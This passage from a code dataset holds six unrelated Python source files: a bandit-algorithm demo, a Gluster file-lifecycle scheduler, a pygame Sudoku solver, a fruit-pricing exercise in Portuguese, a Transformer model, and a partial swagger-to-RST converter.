\"\"\"Runs the main script\"\"\"\n logger.info(\"Starting CompareAllBanditsAlgos MAB\")\n test_all = CompareAllBanditsAlgos(\n arms=arms, number_of_trials=number_of_trials,\n time_steps=time_steps, \n q_mean=q_mean, q_sd=q_sd, images_dir=images_dir)\n \n test_all.test_algo(OnlyExploration)\n test_all.test_algo(OnlyExploitation)\n # test_all.test_algo(GaussianThompsonSampling)\n test_all.test_algo(GBA)\n for epsilon in [.9]:\n test_all.test_algo(Greedy, epsilon=epsilon, col_name = f\"Greedy \\u03B5 {epsilon}\")\n test_all.test_algo(UCB, UCB_param=epsilon, col_name = f\"UCB \\u03B5 {epsilon}\")\n if initial>0:\n test_all.test_algo(Greedy, epsilon=epsilon, col_name = f\"Optimistic \\u03B5 {epsilon}\", initial=initial)\n tot_return, best_actions = test_all.return_dfs()\n test_all.plot_returns(tot_return)\n test_all.plot_action_taken(best_actions)\n\n\nif __name__ == \"__main__\":\n bandits = Bandits(number_of_arms = 4, q_mean=[1,2,3,4], q_sd=[0.0, 0.0, 0.0, 0.0])\n bandits.plot_bandits()\n for mab_examples in MABExamples.__subclasses__():\n mab_examples().mab(bandits, pic_name=f\"{mab_examples.__name__}\", times=100)\n\n # Example 1\n main(arms=4, number_of_trials=250, time_steps=75, q_mean=[1,2,3,4], q_sd=[0.0, 0.0, 0.0, 0.0], initial=20)\n\n # Example 2\n main(arms=10, number_of_trials=250, time_steps=50, images_dir=\"images2\", initial=3)","repo_name":"MattiaCinelli/AlgoRL","sub_path":"examples/MAB.py","file_name":"MAB.py","file_ext":"py","file_size_in_byte":6991,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"36558797874","text":"# -*- coding: utf-8 -*-\nfrom config.logconfig import notifier_logger as logger\nimport time\nimport os\nimport datetime\nimport calendar\n\n\ndef is_dir_expiration(handle_time, last_exec_time, handle_type, handle_value):\n \"\"\"\n 判断是否满足执行条件\n :param handle_time: 第一次执行检查时要检查handle_time, 格式为%H:%M\n :param last_exec_time: 上次的执行时间,多次执行后根据上次执行时间+ 时间间隔与当前时间比较\n :param handle_type: 执行策略的时间类型(天、周、月)\n :param handle_value: 执行策略的数值\n :return: bool\n \"\"\"\n ret = False\n try:\n cur_timestamp = int(time.time())\n # 间隔n天执行\n if handle_type == 0: #天\n today = time.strftime(\"%Y-%m-%d\", time.localtime(time.time()))#2020-06-19\n handle_time_str = \"%s %s:00\" % (today, str(handle_time))#2020-06-19 09:12:00\n secs_per_day = int(24 * 60 * 60)# 1天\n interval_seconds = int(handle_value) * secs_per_day# 策略秒\n if last_exec_time == '' and handle_time != '':#第一次检查\n handle_time_secs = int(time.mktime(time.strptime(str(handle_time_str), \"%Y-%m-%d %H:%M:%S\"))) #返回秒\n if cur_timestamp >= handle_time_secs:\n ret = True\n elif last_exec_time != '':\n last_exec_time_secs = int(time.mktime(time.strptime(last_exec_time, \"%Y-%m-%d %H:%M:%S\")))#上一次检查的时间 \n if last_exec_time_secs + interval_seconds <= cur_timestamp:#达到策略值\n ret = True\n\n # 每周定时执行\n elif handle_type == 1:\n weekday = datetime.datetime.now().isoweekday()#周5\n if weekday == int(handle_value):\n handle_time_str = str(handle_time)#第一次检查的时间\n now = time.strftime(\"%H-%M\", time.localtime(time.time()))#当前09:20\n ret = is_timeout(now, handle_time_str)#判断是否超时\n\n # 每月定时执行\n elif handle_type == 2:\n now_day = datetime.datetime.now().day\n now_month = datetime.datetime.now().month\n max_day = calendar.mdays[now_month] #本月共多少天\n handle_day = int(handle_value) #策略值\n if handle_day > max_day:\n handle_day = max_day\n if now_day == handle_day: #非本日 不执行\n handle_time_str = str(handle_time)\n now = time.strftime(\"%H-%M\", time.localtime(time.time()))\n ret = is_timeout(now, handle_time_str) # 当前时间超过默认检查时间 ,则true\n except Exception as error:\n logger.error(\"FileLifeCycle: is_dir_expiration: %s\" % error)\n return ret\n\n\ndef is_timeout(now, handle_time_str):\n \"\"\"\n 判断是否超时\n :param now:%H-%M\n :param handle_time_str:%H:%M\n :return: bool\n \"\"\"\n ret = False\n try:\n handle_hour = handle_time_str.split(\":\")[0]\n handle_minute = handle_time_str.split(\":\")[1]\n now_hour = now.split(\"-\")[0]\n now_minute = now.split(\"-\")[1]\n if handle_hour[0] == \"0\":\n handle_hour = handle_hour[1]\n if handle_minute[0] == \"0\":\n handle_minute = handle_minute[1]\n if now_hour[0] == \"0\":\n now_hour = now_hour[1]\n if now_minute[0] == \"0\":\n now_minute = now_minute[1]\n now_hour_int = int(now_hour)\n now_minute_int = int(now_minute)\n handle_hour_int = int(handle_hour)\n handle_minute_int = int(handle_minute)\n if now_hour_int > handle_hour_int:\n ret = True\n elif now_hour_int == handle_hour_int and now_minute_int >= handle_minute_int:\n ret = True\n except Exception as error:\n logger.error(\"FileLifeCycle: is_timeout: %s\" % error)\n return ret\n\n# 使用绝对路径\ndef list_all_files(root_dir):\n \"\"\"\n function:列举目录下的所有文件,返回一个list\n @param root_dir: 根目录\n @return: 文件名list\n \"\"\"\n files = []\n depth = os.listdir(root_dir)\n for i in range(0, len(depth)):\n path = os.path.join(root_dir, depth[i])\n if os.path.isdir(path):\n files.extend(list_all_files(path))\n if os.path.isfile(path):\n files.append(path)\n return files\n\n\n","repo_name":"xiaoluo260/gluster","sub_path":"file_life_cycle/src/Notifier/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73744984693","text":"import pygame, copy, sys, logging\nfrom sudoku_solver import is_num, get_map, check_hor, check_ver, check_square\nimport time\nfrom components.display_board import display_board\nfrom pygame_init import *\nimport pygame_init\n\nglobal solving\n\ndef setup_reference():\n for i in range(9):\n for j in range(9):\n if board[i][j] != 0:\n board_reference[i][j] = 1\n\ndef button(pos, dim, text, text_offset, fun, width):\n mouse_pos = pygame.mouse.get_pos()\n global click_lock\n\n if pygame.mouse.get_pressed()[0] is False:\n click_lock = False\n\n if (mouse_pos[0] > pos[0] and mouse_pos[0] < pos[0] + dim[0]) and (mouse_pos[1] > pos[1] and mouse_pos[1] < pos[1] + dim[1]):\n pygame.draw.rect(screen, pygame.Color(255, 255, 255), (pos[0], pos[1], dim[0], dim[1]))\n if click_lock is False and pygame.mouse.get_pressed()[0] is True:\n fun()\n click_lock = True\n screen.blit(my_font.render(text, False, (0, 0, 0)), (pos[0] + text_offset[0], pos[1] + text_offset[1]))\n else:\n pygame.draw.rect(screen, pygame.Color(255, 255, 255), (pos[0], pos[1], dim[0], dim[1]), width)\n screen.blit(my_font.render(text, False, (255, 255, 255)), (pos[0] + text_offset[0], pos[1] + text_offset[1]))\n\ndef reset():\n for i in range(9):\n for j in range(9):\n if board_reference[i][j] == 0:\n board[i][j] = 0\n\ndef solve():\n reset()\n pygame_init.solving = True\n print(pygame_init.solving)\n recursive_solve(board, 0, 0)\n\ndef get_highlight_position(x, y):\n y_pos = (y + 1) * 60 - 5 * y\n y_pos += 10 if y >= 3 else 0\n y_pos += 10 if y >= 6 else 0\n x_pos = x * 60 + 20 - (5 * x)\n x_pos += 10 if x >= 3 else 0\n x_pos += 10 if x >= 6 else 0\n return x_pos + 4, y_pos + 4\n\ndef highlight_cell(x, y, cell_color, value_color):\n pos = get_highlight_position(x, y)\n pygame.draw.rect(screen, cell_color, (pos[0], pos[1], 52, 52))\n screen.blit(my_font.render(str(board[y][x]), False, value_color), (pos[0] + 15, pos[1] + 4))\n time.sleep(0.2)\n\ndef recursive_solve(board, x, y):\n if x == 9:\n x = 0\n y += 1\n if y == 9:\n return True\n while board[y][x] != 0:\n x += 1\n if x == 9:\n x = 0\n y += 1\n if y == 9:\n return True\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n for i in range(9):\n board[y][x] += 1\n if check_hor(board, x, y) is True and check_ver(board, x, y) is True and check_square(board, x, y) is True:\n display_board()\n\n highlight_cell(x, y, pygame.Color(255, 255, 255), pygame.Color(0, 200, 0))\n\n refresh_screen()\n if recursive_solve(board, x + 1, y) is True:\n return True\n board[y][x] = 0\n return False\n\ndef refresh_screen():\n pygame.display.flip()\n screen.fill(\"black\")\n clock.tick(60)\n\n\ndef game_loop():\n global running\n\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n display_buttons()\n display_board()\n refresh_screen()\n\ndef exit_game():\n global running\n running = False\n\ndef display_buttons():\n button((570, 200), (200, 50), 'Solve', (45, 2), solve, 3)\n button((570, 300), (200, 50), 'Reset', (45, 2), reset, 3)\n button((570, 400), (200, 50), 'Exit', (65, 2), exit_game, 3)\n\ndef init():\n global screen\n global clock\n\n setup_check_board()\n setup_reference()\n\n pygame.init()\n\n game_loop()\n pygame.quit()\n\nwith open(get_map(), \"r\") as f:\n file_map = f.read()\n f.close()\n\n\ndef setup_check_board():\n global board\n\n k = 0\n for i in range(9):\n for j in range(9):\n try:\n board[i][j] = int(file_map[k])\n k += 2\n except:\n logging.error('Invalid map format')\n exit()\n\ninit()","repo_name":"GarnierLenny/Pydoku","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2673193273","text":"\"\"\"Uma fruteira está vendendo frutas com a seguinte tabela de preços:\n Até 5 Kg Acima de 5 Kg\nMorango R$ 2,50 por Kg R$ 2,20 por Kg\nMaçã R$ 1,80 por Kg R$ 1,50 por Kg\n\nSe o cliente comprar mais de 8 Kg em frutas ou o valor total da compra ultrapassar R$ 25,00, receberá ainda um desconto\nde 10% sobre este total. Escreva um algoritmo para ler a quantidade (em Kg) de morangos e a quantidade (em Kg) de maças\nadquiridas e escreva o valor a ser pago pelo cliente.\n\"\"\"\n\nqtd_em_kg_morango = float(input('Informe a quantidade em Kg de morangos: '))\nqtd_em_kg_macas = float(input('Informe a quantidade em Kg de maçãs: '))\n\nif qtd_em_kg_morango <= 5:\n preco_total_morangos = qtd_em_kg_morango * 2.50\nelse:\n preco_total_morangos = qtd_em_kg_morango * 2.20\n\nif qtd_em_kg_macas <= 5:\n preco_total_macas = qtd_em_kg_macas * 1.80\nelse:\n preco_total_macas = qtd_em_kg_macas * 1.50\n\npeso_total_frutas = qtd_em_kg_macas + qtd_em_kg_morango\npreco_total_frutas = preco_total_macas + preco_total_morangos\n\nif peso_total_frutas > 8 or preco_total_frutas > 25:\n preco_total_frutas *= 0.9\n\nprint(f'Preço total: R$ {preco_total_frutas:.2f}')\n","repo_name":"mateuslourenco/exericicios-wiki-python","sub_path":"Estrutura de Decisão/ex_27.py","file_name":"ex_27.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1649247382","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nfrom layers import *\n\nclass Transformer(tf.keras.Model):\n def __init__(self, num_layers, d_model, binary_size, dff, pos, \n target_vocab_size, make_sym, use_pos, out_num, out_pos, res_ratio, rate=0.1):\n super(Transformer, self).__init__()\n \n self.num_layers = num_layers\n self.NN = point_wise_feed_forward_network(1, dff)\n self.encoder = Encoder(num_layers, d_model, binary_size, dff, \n pos, make_sym, res_ratio, rate)\n\n self.decoder = Decoder(num_layers, d_model, binary_size, dff, \n pos, make_sym, res_ratio, rate)\n self.emb = tf.keras.layers.Dense(d_model, use_bias=False)\n self.use_pos = use_pos\n self.out_num = out_num\n self.out_pos = out_pos\n self.final_layer = tf.keras.layers.Dense(target_vocab_size)\n \n def call(self, inp, tar, training, enc_padding_mask, \n com_mask, dec_padding_mask):\n\n enc_output = self.encoder(inp, training, enc_padding_mask, self.NN, self.emb, self.use_pos) # (batch_size, inp_seq_len, d_model)\n # dec_output.shape == (batch_size, tar_seq_len, d_model)\n dec_output, attention_weights = self.decoder(\n tar, enc_output, training, com_mask, dec_padding_mask, self.NN, self.emb, self.use_pos)\n\n final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)\n return_list = []\n if self.out_num:\n return_list.append(final_output)\n return_list.append(attention_weights)\n if self.out_pos:\n last_att_weights = attention_weights['decoder_layer{}_block2'.format(self.num_layers)]\n last_att_weights = tf.reshape(last_att_weights, [-1, last_att_weights.shape[1]*last_att_weights.shape[2], last_att_weights.shape[-1]])\n return_list.append(last_att_weights)\n return return_list\n\nclass mask_transform(tf.keras.layers.Layer):\n '''\n 1D Convnet for learning mask transformation\n '''\n def __init__(self, num_filters, filter_size, rate=0.1):\n super(mask_transform, self).__init__()\n self.CNN = tf.keras.layers.Conv1D(num_filters, filter_size, padding='same', activation='relu')\n self.final = tf.keras.layers.Dense(1)\n self.dropout = tf.keras.layers.Dropout(rate)\n def call(self, x, training):\n cnn_out = self.CNN(x) ###### batch_size*state_size, seq_len, 2\n cnn_out = self.dropout(cnn_out,training=training)\n out = self.final(cnn_out)\n return tf.squeeze(out, axis=-1)","repo_name":"Yujun-Yan/Neural-Execution-Engines","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"3070172629","text":"import json\nimport re\nfrom collections import defaultdict\nfrom functools import partial\nfrom hashlib import md5\nfrom operator import attrgetter\n\nfrom cached_property import cached_property\nfrom jsonschema import (\n validate as schema_validate, FormatChecker, ValidationError, SchemaError)\n\nfrom swg2rst.converter_exceptions import ConverterError\nfrom swg2rst.utils.logger import get_logger\n\n\nPRIMITIVE_TYPES = ('integer', 'number', 'string', 'boolean')\n_DEFAULT_EXAMPLES = {\n 'integer': 1,\n 'number': 1.0,\n 'string': 'somestring',\n 'date': '2015-01-01',\n 'date-time': '2015-01-01T15:00:00.000Z',\n 'boolean': True,\n 'password': '*****',\n}\n\n#: json validation schema for examples file\nexamples_json_schema = {\n 'type': 'object',\n 'properties': {\n 'array_items_count': {\n 'type': 'integer',\n 'minimum': 1,\n 'maximum': 5\n },\n 'types': {\n 'type': 'object',\n 'properties': {\n 'string': {\n 'type': 'string'\n },\n 'date': {\n 'type': 'string',\n 'format': 'date'\n },\n 'date-time': {\n 'type': 'string',\n 'format': 'date-time'\n },\n 'integer': {\n 'type': 'integer'\n },\n 'number': {\n 'type': 'number'\n },\n 'boolean': {\n 'type': 'boolean'\n }\n },\n 'additionalProperties': False\n },\n 'definitions': {\n 'type': 'object',\n 'patternProperties': {\n '^#/definitions/\\w+$': {\n 'type': 'object'\n }\n },\n 'additionalProperties': False\n },\n 'paths': {\n 'type': 'object',\n 'patternProperties': {\n '^/': {\n 'type': 'object',\n 'patternProperties': {\n '^[a-z]{,7}$': {\n 'type': 'object',\n 'properties': {\n 'parameters': {\n 'type': 'object'\n },\n 'responses': {\n 'type': 'object'\n }\n },\n 'additionalProperties': False\n }\n },\n 'additionalProperties': False\n }\n },\n 'additionalProperties': False\n }\n },\n 'additionalProperties': False,\n}\n\n\nclass SchemaTypes(object):\n \"\"\" Types of the schema object\n \"\"\"\n INLINE = 'inline'\n DEFINITION = 'definition'\n\n prefixes = {\n INLINE: INLINE[0],\n DEFINITION: DEFINITION[0],\n }\n\n\nclass SecurityTypes(object):\n \"\"\" Types of the security scheme\n \"\"\"\n BASIC = 'basic'\n OAUTH2 = 'oauth2'\n API_KEY = 'apiKey'\n\n names = {\n BASIC: 'HTTP Basic Authentication',\n OAUTH2: 'OAuth 2.0',\n API_KEY: 'API Key',\n }\n\n\nclass Exampilator(object):\n \"\"\" Example Manager\n \"\"\"\n\n DEFAULT_EXAMPLES = _DEFAULT_EXAMPLES.copy()\n CUSTOM_EXAMPLES = dict()\n EXAMPLE_ARRAY_ITEMS_COUNT = 2\n\n logger = get_logger()\n _json_format_checker = FormatChecker()\n\n @classmethod\n def fill_examples(cls, examples):\n\n if 'array_items_count' in examples:\n cls.EXAMPLE_ARRAY_ITEMS_COUNT = examples['array_items_count']\n if 'types' in examples:\n cls.DEFAULT_EXAMPLES.update(examples['types'])\n if 'definitions' in examples:\n for path, fields in examples['definitions'].items():\n for field, value in fields.items():\n key = '.'.join((path, field))\n cls.CUSTOM_EXAMPLES[key] = value\n if 'paths' in examples:\n for path, methods in examples['paths'].items():\n key = \"#/paths/'{}'\".format(path)\n for method, operations in methods.items():\n for section, fields in operations.items():\n for field, value in fields.items():\n _key = '/'.join((key, method, section, field))\n cls.CUSTOM_EXAMPLES[_key] = value\n\n @classmethod\n def get_example_value_for_primitive_type(cls, type_, properties, format_, **kw):\n paths = kw.get('paths')\n if paths:\n result, path = cls._get_custom_example(paths)\n if result:\n cls._example_validate(path, result, type_, format_)\n return result\n\n if properties.get('default') is not None:\n result = properties['default']\n elif properties.get('enum'):\n result = properties['enum'][0]\n else:\n result = getattr(cls, '%s_example' % type_)(properties, format_)\n\n return result\n\n @classmethod\n def string_example(cls, properties, type_format):\n result = cls.DEFAULT_EXAMPLES[type_format or 'string']\n if properties.get('min_length'):\n result.ljust(properties['min_length'], 'a')\n if properties.get('max_length'):\n result = result[:properties['max_length']]\n return result\n\n @classmethod\n def integer_example(cls, properties, *args):\n result = cls.DEFAULT_EXAMPLES['integer']\n if properties.get('minimum') is not None and result < properties['minimum']:\n result = properties['minimum']\n if properties.get('exclusive_minimum', False):\n result += 1\n elif properties.get('maximum') is not None and result > properties['maximum'] :\n result = properties['maximum']\n if properties.get('exclusive_maximum', False):\n result -= 1\n return result\n\n @classmethod\n def number_example(cls, properties, *args):\n return cls.integer_example(properties)\n\n @classmethod\n def boolean_example(cls, *args):\n return cls.DEFAULT_EXAMPLES['boolean']\n\n @classmethod\n def get_example_by_schema(cls, schema, ignored_schemas=None, paths=None, name=''):\n \"\"\" Get example by schema object\n\n :param Schema schema: current schema\n :param list ignored_schemas: list of previous schemas\n for avoid circular references\n :param list paths: list object paths (ex. #/definitions/Model.property)\n If nested schemas exists, custom examples checks in order from paths\n :param str name: name of property schema object if exists\n :return: dict or list (if schema is array)\n \"\"\"\n if schema.schema_example:\n return schema.schema_example\n\n if ignored_schemas is None:\n ignored_schemas = []\n\n if paths is None:\n paths = []\n\n if name:\n paths = list(map(lambda path: '.'.join((path, name)), paths))\n\n if schema.ref_path:\n paths.append(schema.ref_path)\n\n if schema.schema_id in ignored_schemas:\n result = [] if schema.is_array else {}\n else:\n schemas = ignored_schemas + [schema.schema_id]\n kwargs = dict(\n ignored_schemas=schemas,\n paths=paths\n )\n if schema.is_array:\n result = cls.get_example_for_array(\n schema.item, **kwargs)\n elif schema.type in PRIMITIVE_TYPES:\n result = cls.get_example_value_for_primitive_type(\n schema.type, schema.raw, schema.type_format, paths=paths\n )\n elif schema.all_of:\n result = {}\n for _schema_id in schema.all_of:\n schema = SchemaObjects.get(_schema_id)\n result.update(cls.get_example_by_schema(schema, **kwargs))\n else:\n result = cls.get_example_for_object(\n schema.properties, **kwargs)\n return result\n\n @classmethod\n def get_body_example(cls, operation):\n \"\"\" Get example for body parameter example by operation\n\n :param Operation operation: operation object\n \"\"\"\n path = \"#/paths/'{0.path}'/{0.method}/parameters/{name}\".format(\n operation, name=operation.body.name or 'body')\n return cls.get_example_by_schema(operation.body, paths=[path])\n\n @classmethod\n def get_response_example(cls, operation, response):\n \"\"\" Get example for response object by operation object\n\n :param Operation operation: operation object\n :param Response response: response object\n \"\"\"\n path = \"#/paths/'{}'/{}/responses/{}\".format(\n operation.path, operation.method, response.name)\n kwargs = dict(paths=[path])\n\n if response.type in PRIMITIVE_TYPES:\n result = cls.get_example_value_for_primitive_type(\n response.type, response.properties, response.type_format, **kwargs)\n else:\n schema = SchemaObjects.get(response.type)\n result = cls.get_example_by_schema(schema, **kwargs)\n\n return result\n\n @classmethod\n def get_header_example(cls, header):\n \"\"\" Get example for header object\n\n :param Header header: Header object\n :return: example\n :rtype: dict\n \"\"\"\n if header.is_array:\n result = cls.get_example_for_array(header.item)\n else:\n example_method = getattr(cls, '{}_example'.format(header.type))\n result = example_method(header.properties, header.type_format)\n return {header.name: result}\n\n @classmethod\n def get_property_example(cls, property_, **kw):\n \"\"\" Get example for property\n\n :param dict property_:\n :return: example value\n \"\"\"\n paths = kw.get('paths', None)\n name = kw.get('name', '')\n result = None\n if name and paths:\n paths = list(map(lambda path: '.'.join((path, name)), paths))\n result, path = cls._get_custom_example(paths)\n if result is not None and property_['type'] in PRIMITIVE_TYPES:\n cls._example_validate(\n path, result, property_['type'], property_['type_format'])\n return result\n\n if SchemaObjects.contains(property_['type']):\n schema = SchemaObjects.get(property_['type'])\n if result is not None:\n if schema.is_array:\n if not isinstance(result, list):\n result = [result] * cls.EXAMPLE_ARRAY_ITEMS_COUNT\n else:\n if isinstance(result, list):\n cls.logger.warning(\n 'Example type mismatch in path {}'.format(schema.ref_path))\n else:\n result = cls.get_example_by_schema(schema, **kw)\n else:\n result = cls.get_example_value_for_primitive_type(\n property_['type'],\n property_['type_properties'],\n property_['type_format'],\n **kw\n )\n return result\n\n @classmethod\n def _get_custom_example(cls, paths):\n if cls.CUSTOM_EXAMPLES:\n for path in paths:\n if path in cls.CUSTOM_EXAMPLES:\n return cls.CUSTOM_EXAMPLES[path], path\n return None, ''\n\n @classmethod\n def get_example_for_array(cls, obj_item, **kw):\n return [cls.get_property_example(obj_item, **kw)] * cls.EXAMPLE_ARRAY_ITEMS_COUNT\n\n @classmethod\n def get_example_for_object(cls, properties, **kw):\n result = {}\n if properties:\n for _property in properties:\n kw['name'] = _property['name']\n result[_property['name']] = cls.get_property_example(\n _property, **kw)\n return result\n\n @classmethod\n def schema_validate(cls, obj, json_schema):\n schema_validate(obj, json_schema, format_checker=cls._json_format_checker)\n\n @classmethod\n def _example_validate(cls, path, value, type_, format_=None):\n _json_schema = {'type': type_}\n if format_:\n _json_schema['format'] = format_\n try:\n cls.schema_validate(value, _json_schema)\n except (ValidationError, SchemaError):\n cls.logger.warning('Example type mismatch in path {}'.format(path))\n\n\nclass SchemaObjects(object):\n \"\"\" Schema collection\n \"\"\"\n\n _schemas = dict()\n\n @classmethod\n def create_schema(cls, obj, name, schema_type, root):\n \"\"\" Create Schema object\n\n :param dict obj: swagger schema object\n :param str name: schema name\n :param str schema_type: schema location.\n Can be ``inline`` or ``definition``\n :param BaseSwaggerObject root: root doc\n :return: new schema\n :rtype: Schema\n \"\"\"\n schema = Schema(obj, schema_type, name=name, root=root)\n cls.add_schema(schema)\n return schema\n\n @classmethod\n def add_schema(cls, schema):\n \"\"\" Add schema object to collection\n\n :param Schema schema:\n \"\"\"\n cls._schemas[schema.schema_id] = schema\n\n @classmethod\n def get(cls, schema_id):\n \"\"\" Get schema object from collection by id\n\n :param str schema_id:\n :return: schema\n :rtype: Schema\n \"\"\"\n return cls._schemas.get(schema_id)\n\n @classmethod\n def get_schemas(cls, schema_types=None, sort=True):\n \"\"\"\n Get schemas by type. If ``schema_type`` is None, return all schemas\n\n :param schema_types: list of schema types\n :type schema_types: list or None\n :param bool sort: sort by name\n :return: list of schemas\n :rtype: list\n \"\"\"\n result = filter(lambda x: not x.is_inline_array, cls._schemas.values())\n if schema_types:\n result = filter(lambda x: x.schema_type in schema_types, result)\n if sort:\n result = sorted(result, key=attrgetter('name'))\n return result\n\n @classmethod\n def contains(cls, key):\n \"\"\" Check schema existence in collection by id\n\n :param str key:\n :rtype: bool\n \"\"\"\n return key in cls._schemas\n\n @classmethod\n def clear(cls):\n cls._schemas = dict()\n\n @classmethod\n def get_type_description(cls, _type, *args, **kwargs):\n \"\"\" Get description of type\n\n :param str _type:\n :param post_callback:\n :rtype: str\n \"\"\"\n if not cls.contains(_type):\n return _type\n\n schema = cls.get(_type)\n if schema.all_of:\n models = ', '.join(map(\n partial(cls.get_type_description, *args, **kwargs), schema.all_of))\n result = '({})'.format(models)\n elif schema.is_array:\n result = 'array of {}'.format(\n cls.get_type_description(schema.item['type'], *args, **kwargs))\n else:\n result = schema.name\n if kwargs.get('post_callback'):\n result = kwargs['post_callback'](result, schema, *args, **kwargs)\n return result\n\n\nclass SecurityMixin(object):\n\n security = None\n\n def _fill_securities(self, obj):\n self.security = {}\n for security in obj:\n self.security.update(security)\n\n\nclass BaseSwaggerObject(SecurityMixin):\n \"\"\" Represents Swagger Object\n \"\"\"\n raw = None\n\n #: Operation collection\n #:\n #: key: operation_id, value: Operation object\n operations = None\n\n #: Operations grouped by tags\n #:\n #: key: tag name, value: list of Operation object\n tags = None\n\n schemas = SchemaObjects\n\n #: Parameter definitions from Parameters Definitions Object\n #:\n #: key: reference path, value: Parameter object\n parameter_definitions = None\n\n #: Response definitions from Responses Definitions Object\n #:\n #: key: reference path, value: Response object\n response_definitions = None\n\n #: Security definitions from Security Definitions Object\n #:\n #: key: security name, value: SecurityDefinition object\n security_definitions = None\n\n #: Represents tag descriptions from Swagger Tag Object\n #:\n #: key: tag name, value: dict with keys ``description`` and ``externalDocs``\n tag_descriptions = None\n\n #: Example Manager. Must be subclass of Exampilator\n exampilator = None\n\n def __init__(self, obj, exampilator=None, examples=None):\n if obj['swagger'] != '2.0':\n raise ConverterError('Invalid Swagger version')\n\n self.raw = obj\n self.exampilator = exampilator or Exampilator\n assert issubclass(self.exampilator, Exampilator)\n if examples:\n try:\n self.exampilator.schema_validate(examples, examples_json_schema)\n except ValidationError as err:\n raise ConverterError(err.message)\n\n self.exampilator.fill_examples(examples)\n\n if 'definitions' in obj:\n self._fill_schemas_from_definitions(obj['definitions'])\n\n if 'parameters' in obj:\n self._fill_parameter_definitions(obj['parameters'])\n\n if 'responses' in obj:\n self._fill_response_definitions(obj['responses'])\n\n if 'securityDefinitions' in obj:\n self._fill_security_definitions(obj['securityDefinitions'])\n\n if 'security' in obj:\n self._fill_securities(obj['security'])\n\n self.info = obj['info']\n self.host = obj.get('host', '')\n self.base_path = obj.get('basePath', '')\n self.consumes = obj.get('consumes', ['application/json'])\n self.produces = obj.get('produces', ['application/json'])\n self.schemes = obj.get('schemes', ['http'])\n self._fill_operations()\n self.external_docs = obj.get('externalDocs')\n\n def _fill_operations(self):\n self.operations = {}\n self._fill_tag_descriptions()\n self.tags = defaultdict(list)\n for path, operations in self.raw['paths'].items():\n path_params = []\n for param in operations.get('parameters', []):\n if param.get('$ref'):\n path_params.append(self.parameter_definitions[param['$ref']])\n else:\n path_params.append(\n Parameter(param, name=param['name'], root=self))\n for method, operation in operations.items():\n if method == 'parameters':\n continue\n op = Operation(operation, method, path, self, path_params)\n self.operations[op.operation_id] = op\n for tag in op.tags:\n self.tags[tag].append(op)\n\n def _fill_tag_descriptions(self):\n if 'tags' in self.raw:\n self.tag_descriptions = {}\n for tag in self.raw['tags']:\n if 'description' in tag or 'externalDocs' in tag:\n self.tag_descriptions[tag['name']] = {\n 'description': tag.get('description'),\n 'externalDocs': tag.get('externalDocs')\n }\n\n def _fill_schemas_from_definitions(self, obj):\n self.schemas.clear()\n for name, definition in obj.items():\n self.schemas.create_schema(\n definition, name, SchemaTypes.DEFINITION, root=self)\n\n def _fill_parameter_definitions(self, obj):\n self.parameter_definitions = {}\n for name, parameter in obj.items():\n key = '#/parameters/{}'.format(name)\n self.parameter_definitions[key] = Parameter(\n parameter, name=parameter['name'], root=self)\n\n def _fill_response_definitions(self, obj):\n self.response_definitions = {}\n for name, response in obj.items():\n key = '#/responses/{}'.format(name)\n self.response_definitions[key] = Response(\n response, name=name, root=self)\n\n def _fill_security_definitions(self, obj):\n self.security_definitions = {\n name: SecurityDefinition(name, _obj) for name, _obj in obj.items()\n }\n\n def get_type_description(self, _type, *args, **kwargs):\n \"\"\" Get description of type\n\n :param str _type:\n :rtype: str\n \"\"\"\n return self.schemas.get_type_description(_type, *args, **kwargs)\n\n\nclass Operation(SecurityMixin):\n \"\"\" Represents Swagger Operation Object\n \"\"\"\n parameters = None\n responses = None\n method = None\n path = None\n root = None #: root swagger object\n\n def __init__(self, obj, method, path, root, path_params=None):\n self.method = method\n self.path = path\n self.root = root\n\n self.operation_id = obj.get(\n 'operationId', self.get_operation_id(method, path))\n\n self.summary = obj.get('summary')\n self.description = obj.get('description')\n self.consumes = obj.get('consumes', self.root.consumes)\n self.produces = obj.get('produces', self.root.produces)\n self.schemes = obj.get('schemes', self.root.schemes)\n self._fill_parameters(obj.get('parameters', []), path_params)\n self._fill_responses(obj['responses'])\n\n self.deprecated = obj.get('deprecated', False)\n\n self.tags = obj.get('tags', ['default'])\n self.external_docs = obj.get('externalDocs')\n\n if 'security' in obj:\n self._fill_securities(obj['security'])\n\n @staticmethod\n def get_operation_id(method, path):\n op_id = '{}_{}'.format(method, path)\n\n # copy-paste from swagger-js\n op_id = re.sub('[\\s!@#$%^&*()+=\\[{\\]};:<>|./?,\\'\"-]', '_', op_id)\n op_id = re.sub('(_){2,}', '_', op_id)\n op_id = re.sub('^[_]*', '', op_id)\n op_id = re.sub('([_]*)$', '', op_id)\n\n return op_id\n\n def _fill_parameters(self, params, path_params):\n self.parameters = []\n for obj in params:\n if '$ref' in obj:\n self.parameters.append(self.root.parameter_definitions[obj['$ref']])\n else:\n self.parameters.append(\n Parameter(obj, name=obj['name'], root=self.root))\n if path_params:\n self.parameters += path_params\n if len(self.get_parameters_by_location(['body'])) > 1:\n raise ConverterError(\n 'Invalid source file: More than one body parameters in %s' % self.path)\n\n def _fill_responses(self, responses):\n self.responses = {}\n for code, obj in responses.items():\n if '$ref' in obj:\n self.responses[code] = self.root.response_definitions[obj['$ref']]\n else:\n self.responses[code] = Response(obj, name=code, root=self.root)\n\n def get_parameters_by_location(self, locations=None, excludes=None):\n \"\"\" Get parameters list by location\n\n :param locations: list of locations\n :type locations: list or None\n :param excludes: list of excludes locations\n :type excludes: list or None\n :return: list of Parameter\n 